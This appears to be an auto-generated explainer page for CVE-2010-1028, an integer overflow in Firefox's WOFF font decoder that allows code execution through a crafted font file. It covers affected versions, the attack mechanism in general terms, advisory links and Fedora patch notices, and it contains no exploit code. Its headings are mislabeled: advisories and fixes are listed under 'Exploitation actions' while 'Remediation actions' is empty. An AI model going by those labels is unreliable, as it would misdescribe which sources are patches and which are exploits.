firefox: integer overflow in the Web Open Fonts Format (WOFF) decoder of Mozilla Firefox leading to a buffer overflow (CVE-2010-1028) #shorts

Summary

Welcome to Security Spotlight. Today we’re unpacking CVE-2010-1028, a decade-old but educational vulnerability in Mozilla’s Web Open Fonts Format decoder that allowed remote code execution via a crafted WOFF file. We’ll cover how it works, the products affected, and the patches that finally put it to rest.

Product details

CVE-2010-1028 impacts the WOFF font decoder built into Mozilla Firefox 3.6 before 3.6.2 and 3.7 before 3.7 alpha 3. Beyond Firefox, font conversion libraries like sfnt2woff-zopfli in Linux distributions—Fedora 41 and 42 notably—also received security updates to mitigate any downstream risks.

Vulnerability type summary

This is an integer-overflow vulnerability that occurs during decompression of a WOFF container. The overflow leads to a buffer overflow, giving an attacker the ability to inject and execute arbitrary code on the victim’s machine.

Details of the vulnerability

At its core, the WOFF decoder miscalculates the size needed to decompress font data. An attacker crafts a malicious WOFF file that triggers an integer overflow, causing the decoder to allocate insufficient memory. When the decompression engine writes beyond the buffer boundary, it overwrites critical memory structures. Security researchers demonstrated exploitation using the VulnDisco 9.0 vd_ff module, achieving remote code execution in unpatched Firefox browsers.

Conclusion

While CVE-2010-1028 was addressed in 2010 with Firefox 3.6.2 and later releases, it highlights the lasting impact of integer-overflow bugs in multimedia parsers. Modern users should always run current browser versions and keep system libraries—like Fedora’s sfnt2woff-zopfli—up to date to guard against any lingering or related flaws.

This chain involves the following actors

• Remote attacker: Initiator of the exploit
• Firefox user: Target of the exploit

This following systems are involved

• Mozilla Firefox 3.6 before 3.6.2 (Web browser): Vulnerable software
• Mozilla Firefox 3.7 before 3.7 alpha 3 (Web browser): Vulnerable software

Attack entry point

• WOFF decoder: Component that decompresses Web Open Font Format resources
• Crafted WOFF file: Font file manipulated to trigger integer overflow and buffer overflow

Remediation actions

Exploitation actions

• https://bugzilla.mozilla.org/show_bug.cgi?id=552216
• https://forum.immunityinc.com/board/thread/1161/vulndisco-9-0/
• http://blog.mozilla.com/security/2010/02/22/secunia-advisory-sa38608/
• http://www.h-online.com/security/news/item/Zero-day-exploit-for-Firefox-3-6-936124.html
• http://blog.psi2.de/en/2010/02/20/going-commercial-with-firefox-vulnerabilities/
• http://secunia.com/advisories/38608
• https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7969
• http://blog.mozilla.com/security/2010/03/18/update-on-secunia-advisory-sa38608/
• http://www.mozilla.org/security/announce/2010/mfsa2010-08.html
• http://www.kb.cert.org/vuls/id/964549
• http://secunia.com/community/forum/thread/show/3592
• [2025-05-20] Fedora 42 release includes a security fix for CVE-2010-1028 and other security-relevant bugs.
• [2025-05-20] Fedora 41 releases security fix for CVE-2010-1028 and other bugs.
• [2025-05-20] Fedora 42 releases sfnt2woff-zopfli 2025-314065 with security fixes for CVE-2010-1028 and other bugs.
• [2025-05-20] Fedora 41 releases sfnt2woff-zopfli 2025-a2a56326b3 with a security fix for CVE-2010-1028 and other bugs.